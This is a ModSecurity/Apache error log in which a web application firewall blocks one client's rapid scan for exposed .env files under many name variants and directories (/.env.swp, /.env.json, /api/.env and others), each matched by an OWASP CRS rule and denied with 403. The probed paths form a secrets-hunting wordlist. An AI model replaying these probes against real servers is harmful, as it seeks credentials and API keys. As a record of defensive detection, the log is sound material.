[Mon May 11 15:50:05.554132 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agHejay-5-wpj6Sx56aibgAAABc"]
[Mon May 11 15:50:05.554548 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agHejay-5-wpj6Sx56aibgAAABc"]
[Mon May 11 15:50:05.554734 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agHejay-5-wpj6Sx56aibgAAABc"]
[Mon May 11 15:50:05.652411 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHejay-5-wpj6Sx56aibwAAABc"]
[Mon May 11 15:50:05.652803 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHejay-5-wpj6Sx56aibwAAABc"]
[Mon May 11 15:50:05.652991 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHejay-5-wpj6Sx56aibwAAABc"]
[Mon May 11 15:50:05.747145 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env1"] [unique_id "agHejay-5-wpj6Sx56aicAAAABc"]
[Mon May 11 15:50:05.747549 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env1"] [unique_id "agHejay-5-wpj6Sx56aicAAAABc"]
[Mon May 11 15:50:05.747731 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env1"] [unique_id "agHejay-5-wpj6Sx56aicAAAABc"]
[Mon May 11 15:50:05.841430 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env2"] [unique_id "agHejay-5-wpj6Sx56aicQAAABc"]
[Mon May 11 15:50:05.841779 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env2"] [unique_id "agHejay-5-wpj6Sx56aicQAAABc"]
[Mon May 11 15:50:05.841956 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env2"] [unique_id "agHejay-5-wpj6Sx56aicQAAABc"]
[Mon May 11 15:50:05.938543 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env_copy"] [unique_id "agHejay-5-wpj6Sx56aicgAAABc"]
[Mon May 11 15:50:05.939073 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env_copy"] [unique_id "agHejay-5-wpj6Sx56aicgAAABc"]
[Mon May 11 15:50:05.939346 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env_copy"] [unique_id "agHejay-5-wpj6Sx56aicgAAABc"]
[Mon May 11 15:50:06.033530 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.txt"] [unique_id "agHejqy-5-wpj6Sx56aicwAAABc"]
[Mon May 11 15:50:06.033893 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.txt"] [unique_id "agHejqy-5-wpj6Sx56aicwAAABc"]
[Mon May 11 15:50:06.034075 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.txt"] [unique_id "agHejqy-5-wpj6Sx56aicwAAABc"]
[Mon May 11 15:50:06.129439 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.json"] [unique_id "agHejqy-5-wpj6Sx56aidAAAABc"]
[Mon May 11 15:50:06.129909 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.json"] [unique_id "agHejqy-5-wpj6Sx56aidAAAABc"]
[Mon May 11 15:50:06.130131 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.json"] [unique_id "agHejqy-5-wpj6Sx56aidAAAABc"]
[Mon May 11 15:50:06.223985 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.yaml"] [unique_id "agHejqy-5-wpj6Sx56aidQAAABc"]
[Mon May 11 15:50:06.224459 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.yaml"] [unique_id "agHejqy-5-wpj6Sx56aidQAAABc"]
[Mon May 11 15:50:06.224675 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.yaml"] [unique_id "agHejqy-5-wpj6Sx56aidQAAABc"]
[Mon May 11 15:50:06.319125 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.yml"] [unique_id "agHejqy-5-wpj6Sx56aidgAAABc"]
[Mon May 11 15:50:06.319613 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.yml"] [unique_id "agHejqy-5-wpj6Sx56aidgAAABc"]
[Mon May 11 15:50:06.319836 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.yml"] [unique_id "agHejqy-5-wpj6Sx56aidgAAABc"]
[Mon May 11 15:50:06.413722 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHejqy-5-wpj6Sx56aieQAAABc"]
[Mon May 11 15:50:06.414188 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHejqy-5-wpj6Sx56aieQAAABc"]
[Mon May 11 15:50:06.414396 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHejqy-5-wpj6Sx56aieQAAABc"]
[Mon May 11 15:50:06.510308 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agHejqy-5-wpj6Sx56aiegAAABc"]
[Mon May 11 15:50:06.510837 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agHejqy-5-wpj6Sx56aiegAAABc"]
[Mon May 11 15:50:06.511102 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agHejqy-5-wpj6Sx56aiegAAABc"]
[Mon May 11 15:50:06.607188 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHejqy-5-wpj6Sx56aiewAAABc"]
[Mon May 11 15:50:06.607669 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHejqy-5-wpj6Sx56aiewAAABc"]
[Mon May 11 15:50:06.607895 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHejqy-5-wpj6Sx56aiewAAABc"]
[Mon May 11 15:50:06.702501 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agHejqy-5-wpj6Sx56aifAAAABc"]
[Mon May 11 15:50:06.703073 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agHejqy-5-wpj6Sx56aifAAAABc"]
[Mon May 11 15:50:06.703314 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agHejqy-5-wpj6Sx56aifAAAABc"]
[Mon May 11 15:50:06.799087 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/site/.env"] [unique_id "agHejqy-5-wpj6Sx56aifQAAABc"]
